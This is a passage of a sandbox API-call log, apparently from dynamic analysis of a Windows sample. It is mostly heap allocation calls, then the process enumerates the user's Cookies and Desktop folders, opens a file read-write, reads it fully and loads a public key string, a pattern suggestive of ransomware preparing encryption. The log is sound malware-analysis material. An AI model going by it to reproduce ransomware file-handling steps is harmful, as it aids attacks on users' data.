hHeap=0x4970000) returned 1 [0130.255] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x757c9b0 | out: hHeap=0x4970000) returned 1 [0130.255] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x50) returned 0x757c9b0 [0130.255] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x830) returned 0xdcd2280 [0130.255] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcd2280 | out: hHeap=0x4970000) returned 1 [0130.255] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x757c9b0 | out: hHeap=0x4970000) returned 1 [0130.255] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x50) returned 0x757c9b0 [0130.255] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x830) returned 0xdcd2280 [0130.255] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcd2280 | out: hHeap=0x4970000) returned 1 [0130.255] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x757c9b0 | out: hHeap=0x4970000) returned 1 [0130.255] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x50) returned 0x757c9b0 [0130.255] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x820) returned 0xdcd2280 [0130.255] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcd2280 | out: hHeap=0x4970000) returned 1 [0130.255] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x757c9b0 | out: hHeap=0x4970000) returned 1 [0130.255] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x50) returned 0x757c9b0 [0130.255] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x820) returned 0xdcd2280 [0130.255] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcd2280 | out: hHeap=0x4970000) returned 1 [0130.255] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x757c9b0 | out: hHeap=0x4970000) returned 1 [0130.255] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x50) returned 0x757c9b0 [0130.255] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x820) returned 0xdcd2280 [0130.255] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcd2280 | out: hHeap=0x4970000) returned 1 [0130.255] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x757c9b0 | out: hHeap=0x4970000) returned 1 [0130.255] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x50) returned 0x757c9b0 [0130.255] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x830) returned 0xdcd2280 [0130.255] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcd2280 | out: hHeap=0x4970000) returned 1 [0130.255] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x757c9b0 | out: hHeap=0x4970000) returned 1 [0130.255] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x50) returned 0x757c9b0 [0130.255] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x830) returned 0xdcd2280 [0130.256] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0xc46) returned 0x7516fe8 [0130.256] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcd2280 | out: hHeap=0x4970000) returned 1 [0130.256] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x7516fe8 | out: hHeap=0x4970000) returned 1 [0130.256] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x757c9b0 | out: hHeap=0x4970000) returned 1 [0130.256] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x50) returned 0x757c9b0 [0130.256] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x820) returned 0xdcd2280 [0130.256] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcd2280 | out: hHeap=0x4970000) returned 1 [0130.256] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x757c9b0 | out: hHeap=0x4970000) returned 1 [0130.256] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x50) returned 0x757c9b0 [0130.256] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x820) returned 0xdcd2280 [0130.256] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0xc2e) returned 0x7516fe8 [0130.256] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcd2280 | out: hHeap=0x4970000) returned 1 [0130.256] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x7516fe8 | out: hHeap=0x4970000) returned 1 [0130.256] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x757c9b0 | out: hHeap=0x4970000) returned 1 [0130.256] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x50) returned 0x757c9b0 [0130.256] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x860) returned 0x7516fe8 [0130.256] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x7516fe8 | out: hHeap=0x4970000) returned 1 [0130.256] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x757c9b0 | out: hHeap=0x4970000) returned 1 [0130.256] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x50) returned 0x757c9b0 [0130.256] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x860) returned 0x7516fe8 [0130.256] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x7516fe8 | out: hHeap=0x4970000) returned 1 [0130.256] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x757c9b0 | out: hHeap=0x4970000) returned 1 [0130.256] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x50) returned 0x757c9b0 [0130.256] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x820) returned 0xdcd2280 [0130.256] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcd2280 | out: hHeap=0x4970000) returned 1 [0130.256] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x757c9b0 | out: hHeap=0x4970000) returned 1 [0130.256] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x50) returned 0x757c9b0 [0130.256] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x820) returned 0xdcd2280 [0130.256] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcd2280 | out: hHeap=0x4970000) returned 1 [0130.256] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x757c9b0 | out: hHeap=0x4970000) returned 1 [0130.257] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x50) returned 0x757c9b0 [0130.257] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x830) returned 0xdcd2280 [0130.257] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0xc46) returned 0x7516fe8 [0130.257] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcd2280 | out: hHeap=0x4970000) returned 1 [0130.257] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x7516fe8 | out: hHeap=0x4970000) returned 1 [0130.257] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x757c9b0 | out: hHeap=0x4970000) returned 1 [0130.257] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x50) returned 0x757c9b0 [0130.257] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x840) returned 0xdcd2280 [0130.257] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcd2280 | out: hHeap=0x4970000) returned 1 [0130.257] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x757c9b0 | out: hHeap=0x4970000) returned 1 [0130.257] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x50) returned 0x757c9b0 [0130.257] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x840) returned 0xdcd2280 [0130.257] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcd2280 | out: hHeap=0x4970000) returned 1 [0130.257] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x757c9b0 | out: hHeap=0x4970000) returned 1 [0130.257] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x50) returned 0x757c9b0 [0130.257] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x830) returned 0xdcd2280 [0130.257] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcd2280 | out: hHeap=0x4970000) returned 1 [0130.257] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x757c9b0 | out: hHeap=0x4970000) returned 1 [0130.257] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x50) returned 0x757c9b0 [0130.257] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x830) returned 0xdcd2280 [0130.257] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcd2280 | out: hHeap=0x4970000) returned 1 [0130.257] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x757c9b0 | out: hHeap=0x4970000) returned 1 [0130.257] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x50) returned 0x757c9b0 [0130.257] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x830) returned 0xdcd2280 [0130.257] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcd2280 | out: hHeap=0x4970000) returned 1 [0130.257] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x757c9b0 | out: hHeap=0x4970000) returned 1 [0130.257] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x50) returned 0x757c9b0 [0130.257] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x820) returned 0xdcd2280 [0130.257] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcd2280 | out: hHeap=0x4970000) returned 1 [0130.257] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x757c9b0 | out: hHeap=0x4970000) returned 1 [0130.258] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x50) returned 0x757c9b0 [0130.258] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x820) returned 0xdcd2280 [0130.258] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcd2280 | out: hHeap=0x4970000) returned 1 [0130.258] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x757c9b0 | out: hHeap=0x4970000) returned 1 [0130.258] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x50) returned 0x757c9b0 [0130.258] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x820) returned 0xdcd2280 [0130.258] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcd2280 | out: hHeap=0x4970000) returned 1 [0130.258] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x757c9b0 | out: hHeap=0x4970000) returned 1 [0130.258] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x50) returned 0x757c9b0 [0130.258] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x830) returned 0xdcd2280 [0130.258] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcd2280 | out: hHeap=0x4970000) returned 1 [0130.258] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x757c9b0 | out: hHeap=0x4970000) returned 1 [0130.258] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x50) returned 0x757c9b0 [0130.258] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x830) returned 0xdcd2280 [0130.258] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0xc46) returned 0x7516fe8 [0130.258] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcd2280 | out: hHeap=0x4970000) returned 1 [0130.258] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x7516fe8 | out: hHeap=0x4970000) returned 1 [0130.258] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x757c9b0 | out: hHeap=0x4970000) returned 1 [0130.258] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x50) returned 0x757c9b0 [0130.258] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x820) returned 0xdcd2280 [0130.258] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcd2280 | out: hHeap=0x4970000) returned 1 [0130.258] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x757c9b0 | out: hHeap=0x4970000) returned 1 [0130.258] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x50) returned 0x757c9b0 [0130.258] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x860) returned 0x7516fe8 [0130.258] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x7516fe8 | out: hHeap=0x4970000) returned 1 [0130.258] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x757c9b0 | out: hHeap=0x4970000) returned 1 [0130.258] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x50) returned 0x757c9b0 [0130.258] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x860) returned 0x7516fe8 [0130.258] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x7516fe8 | out: hHeap=0x4970000) returned 1 [0130.258] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x757c9b0 | out: hHeap=0x4970000) returned 1 [0130.258] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x50) returned 0x757c9b0 [0130.259] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x820) returned 0xdcd2280 [0130.259] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcd2280 | out: hHeap=0x4970000) returned 1 [0130.259] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x757c9b0 | out: hHeap=0x4970000) returned 1 [0130.259] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x50) returned 0x757c9b0 [0130.259] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x820) returned 0xdcd2280 [0130.259] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcd2280 | out: hHeap=0x4970000) returned 1 [0130.259] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x757c9b0 | out: hHeap=0x4970000) returned 1 [0130.259] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x50) returned 0x757c9b0 [0130.259] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x830) returned 0xdcd2280 [0130.259] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0xc46) returned 0x7516fe8 [0130.259] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcd2280 | out: hHeap=0x4970000) returned 1 [0130.259] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x7516fe8 | out: hHeap=0x4970000) returned 1 [0130.259] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x757c9b0 | out: hHeap=0x4970000) returned 1 [0130.259] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x50) returned 0x757c9b0 [0130.259] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x840) returned 0xdcd2280 [0130.259] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcd2280 | out: hHeap=0x4970000) returned 1 [0130.259] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x757c9b0 | out: hHeap=0x4970000) returned 1 [0130.259] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x50) returned 0x757c9b0 [0130.259] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x840) returned 0xdcd2280 [0130.259] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcd2280 | out: hHeap=0x4970000) returned 1 [0130.259] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x757c9b0 | out: hHeap=0x4970000) returned 1 [0130.259] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x50) returned 0x757c9b0 [0130.259] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x830) returned 0xdcd2280 [0130.259] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcd2280 | out: hHeap=0x4970000) returned 1 [0130.259] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x757c9b0 | out: hHeap=0x4970000) returned 1 [0130.259] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x50) returned 0x757c9b0 [0130.259] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x830) returned 0xdcd2280 [0130.259] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcd2280 | out: hHeap=0x4970000) returned 1 [0130.259] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x757c9b0 | out: hHeap=0x4970000) returned 1 [0130.259] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x50) returned 0x757c9b0 [0130.259] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x830) returned 0xdcd2280 [0130.260] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcd2280 | out: hHeap=0x4970000) returned 1 [0130.260] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x757c9b0 | out: hHeap=0x4970000) returned 1 [0130.260] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x50) returned 0x757c9b0 [0130.260] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x820) returned 0xdcd2280 [0130.260] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcd2280 | out: hHeap=0x4970000) returned 1 [0130.260] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x757c9b0 | out: hHeap=0x4970000) returned 1 [0130.260] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x50) returned 0x757c9b0 [0130.260] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x820) returned 0xdcd2280 [0130.260] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcd2280 | out: hHeap=0x4970000) returned 1 [0130.260] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x757c9b0 | out: hHeap=0x4970000) returned 1 [0130.260] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x50) returned 0x757c9b0 [0130.260] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x820) returned 0xdcd2280 [0130.260] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcd2280 | out: hHeap=0x4970000) returned 1 [0130.260] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x757c9b0 | out: hHeap=0x4970000) returned 1 [0130.260] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x50) returned 0x757c9b0 [0130.260] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x830) returned 0xdcd2280 [0130.260] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcd2280 | out: hHeap=0x4970000) returned 1 [0130.260] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x757c9b0 | out: hHeap=0x4970000) returned 1 [0130.260] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x50) returned 0x757c9b0 [0130.260] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x830) returned 0xdcd2280 [0130.260] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0xc46) returned 0x7516fe8 [0130.260] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcd2280 | out: hHeap=0x4970000) returned 1 [0130.260] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x7516fe8 | out: hHeap=0x4970000) returned 1 [0130.260] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x757c9b0 | out: hHeap=0x4970000) returned 1 [0130.260] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x50) returned 0x757c9b0 [0130.260] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x820) returned 0xdcd2280 [0130.260] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcd2280 | out: hHeap=0x4970000) returned 1 [0130.260] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x757c9b0 | out: hHeap=0x4970000) returned 1 [0130.260] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x50) returned 0x757c9b0 [0130.260] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x860) returned 0x7516fe8 [0130.260] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x7516fe8 | out: hHeap=0x4970000) returned 1 [0130.261] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x757c9b0 | out: hHeap=0x4970000) returned 1 [0130.261] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x50) returned 0x757c9b0 [0130.261] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x860) returned 0x7516fe8 [0130.261] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x7516fe8 | out: hHeap=0x4970000) returned 1 [0130.261] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x757c9b0 | out: hHeap=0x4970000) returned 1 [0130.261] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Cookies\\") returned="Cookies\\" [0130.261] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\") returned="5p5NrGJn0jS HALPmcxz\\" [0130.261] PathFindFileNameW (pszPath="C:\\Users\\") returned="Users\\" [0130.261] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdce9278 | out: hHeap=0x4970000) returned 1 [0130.261] PathFindFileNameW (pszPath="C:\\") returned="C:\\" [0130.261] PathFindFileNameW (pszPath="") returned="" [0130.261] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Cookies\\*", lpFindFileData=0xe00fba4 | out: lpFindFileData=0xe00fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x2eaf1340, ftCreationTime.dwHighDateTime=0x1d2fad7, ftLastAccessTime.dwLowDateTime=0x2eaf1340, ftLastAccessTime.dwHighDateTime=0x1d2fad7, ftLastWriteTime.dwLowDateTime=0x2eaf1340, ftLastWriteTime.dwHighDateTime=0x1d2fad7, nFileSizeHigh=0x0, nFileSizeLow=0x494, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="sikvnb huvuib.contact", cAlternateFileName="SIKVNB~1.CON")) returned 0xffffffff [0130.261] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x757c9b0 | out: hHeap=0x4970000) returned 1 [0130.262] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x750caf0 | out: hHeap=0x4970000) returned 1 [0130.262] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x757ca08 | out: hHeap=0x4970000) returned 1 [0130.262] PeekMessageW (in: lpMsg=0xe00ff08, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0xe00ff08) returned 0 [0130.262] PeekMessageW (in: lpMsg=0xe00fb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0xe00fb74) returned 0 [0130.262] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\") returned="Desktop\\" [0130.262] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\") returned="5p5NrGJn0jS HALPmcxz\\" [0130.262] PathFindFileNameW (pszPath="C:\\Users\\") returned="Users\\" [0130.262] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdce9278 | out: hHeap=0x4970000) returned 1 [0130.262] PathFindFileNameW (pszPath="C:\\") returned="C:\\" [0130.262] PathFindFileNameW (pszPath="") returned="" [0130.262] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\*", lpFindFileData=0xe00fba4 | out: lpFindFileData=0xe00fba4*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x28cff640, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0xc0c6d6a0, ftLastAccessTime.dwHighDateTime=0x1d6d58a, ftLastWriteTime.dwLowDateTime=0xc0c6d6a0, ftLastWriteTime.dwHighDateTime=0x1d6d58a, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x49a4880 [0130.262] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x757c9b0 | out: hHeap=0x4970000) returned 1 [0130.262] FindNextFileW (in: hFindFile=0x49a4880, lpFindFileData=0xe00fba4 | out: lpFindFileData=0xe00fba4*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x28cff640, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0xc0c6d6a0, ftLastAccessTime.dwHighDateTime=0x1d6d58a, ftLastWriteTime.dwLowDateTime=0xc0c6d6a0, ftLastWriteTime.dwHighDateTime=0x1d6d58a, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0130.263] FindNextFileW (in: hFindFile=0x49a4880, lpFindFileData=0xe00fba4 | out: lpFindFileData=0xe00fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xb04b8d40, ftCreationTime.dwHighDateTime=0x1d5ddb8, ftLastAccessTime.dwLowDateTime=0x68f8cfd0, ftLastAccessTime.dwHighDateTime=0x1d5dd26, ftLastWriteTime.dwLowDateTime=0x68f8cfd0, ftLastWriteTime.dwHighDateTime=0x1d5dd26, nFileSizeHigh=0x0, nFileSizeLow=0x10eb9, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="-eaO-tHkHlOr4BSUbCXv.swf", cAlternateFileName="-EAO-T~1.SWF")) returned 1 [0130.263] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\-eaO-tHkHlOr4BSUbCXv.swf") returned=".swf" [0130.263] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\-eaO-tHkHlOr4BSUbCXv.swf" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\-eao-thkhlor4bsubcxv.swf"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5c8 [0130.263] GetFileSizeEx (in: hFile=0x5c8, lpFileSize=0xe00fb40 | out: lpFileSize=0xe00fb40*=69305) returned 1 [0130.263] VirtualAlloc (lpAddress=0x0, dwSize=0x25815, flAllocationType=0x1000, flProtect=0x4) returned 0x6ec0000 [0130.266] SetFilePointerEx (in: hFile=0x5c8, liDistanceToMove=0x10e93, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0130.266] ReadFile (in: hFile=0x5c8, lpBuffer=0x6ec0000, nNumberOfBytesToRead=0x26, lpNumberOfBytesRead=0xe00fb78, lpOverlapped=0x0 | out: lpBuffer=0x6ec0000*, lpNumberOfBytesRead=0xe00fb78*=0x26, lpOverlapped=0x0) returned 1 [0130.267] ReadFile (in: hFile=0x5c8, lpBuffer=0x6ec0000, nNumberOfBytesToRead=0x25805, lpNumberOfBytesRead=0xe00fb70, lpOverlapped=0x0 | out: lpBuffer=0x6ec0000*, lpNumberOfBytesRead=0xe00fb70*=0x10eb9, lpOverlapped=0x0) returned 1 [0130.268] lstrlenA (lpString="-----BEGIN PUBLIC 